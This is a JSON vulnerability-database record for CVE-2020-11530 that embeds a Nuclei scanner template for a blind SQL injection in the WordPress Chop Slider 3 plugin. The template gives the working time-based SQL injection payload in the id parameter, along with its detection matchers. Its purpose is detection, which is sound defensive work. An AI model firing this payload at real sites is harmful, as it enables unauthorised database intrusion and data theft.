{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-11530/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-11530/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-11530/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-11530/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-11530/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-11530"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-11530"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-11530.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2020-11530\n\ninfo:\n  name: WordPress Chop Slider 3 - Blind SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n  remediation: |\n    Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a\n    - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress\n    - https://idangero.us/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-11530\n    - http://seclists.org/fulldisclosure/2020/May/26\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-11530\n    cwe-id: CWE-89\n    epss-score: 0.95657\n    epss-percentile: 0.9987\n    cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: idangero\n    product: chop_slider\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout 10s\n        GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/javascript\")'\n          - 'contains(body, \"$(document).ready(function()\")'\n        condition: and\n# digest: 490a00463044022066d5221ec296eddad7aec5779abff3b4f3bcee7475d2feb8b1f8c19e5779e78402207663c8dbd8e2ef4a775888176575fb82bec7c9b2c408f0d392c18ec61a238184:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-11530"
}